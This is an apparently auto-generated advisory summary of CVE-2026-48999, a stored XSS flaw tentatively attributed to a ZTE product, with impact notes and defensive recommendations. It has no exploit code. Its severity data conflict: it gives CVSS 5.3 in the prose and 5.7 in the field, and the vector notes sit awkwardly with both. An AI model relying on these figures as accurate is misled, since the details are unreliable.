PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-48999 ZTE CVE debrief

CVE-2026-48999 is a stored cross-site scripting (XSS) vulnerability with a CVSS 3.1 score of 5.3 (Medium). The vulnerability allows attackers to inject malicious JavaScript into target systems, which executes in victims' browsers when they access affected pages. This enables session hijacking, cookie theft, and page content tampering. The stored nature of the attack provides broad scope and strong concealment, making it suitable for data theft campaigns. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The vendor has been identified as ZTE based on PSIRT reference evidence, though confidence is low and requires review. The CVE was published on 2026-05-27 and currently holds 'Received' status in the NVD. No known exploitation in ransomware campaigns has been documented, and the vulnerability is not listed in CISA KEV.

Vendor
ZTE
Product
ZTE ZXUniPOS NDS-LTE
CVSS
MEDIUM 5.7
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-27
Original CVE updated
2026-05-27
Advisory published
2026-05-27
Advisory updated
2026-05-27

Who should care

Organizations operating ZTE network equipment or software products; security teams responsible for web application security and XSS mitigation; incident response teams monitoring for session hijacking and data exfiltration attempts

Technical summary

Stored cross-site scripting vulnerability allowing persistent malicious script injection with session hijacking and data theft capabilities

Defensive priority

medium

Recommended defensive actions

  • Apply security patches from vendor when available per resource link annotations
  • Implement Content Security Policy (CSP) headers to mitigate XSS execution
  • Validate and sanitize all user-supplied input before storage and rendering
  • Enable HttpOnly and Secure flags on session cookies to prevent theft
  • Review and restrict privileges for content submission interfaces
  • Monitor for anomalous script injection attempts in application logs

Evidence notes

Vendor identification derived from PSIRT reference domain (support.zte.com.cn) with low confidence; requires verification. CVSS vector confirms network attack vector with high attack complexity, requiring high privileges and user interaction.

Official resources

2026-05-27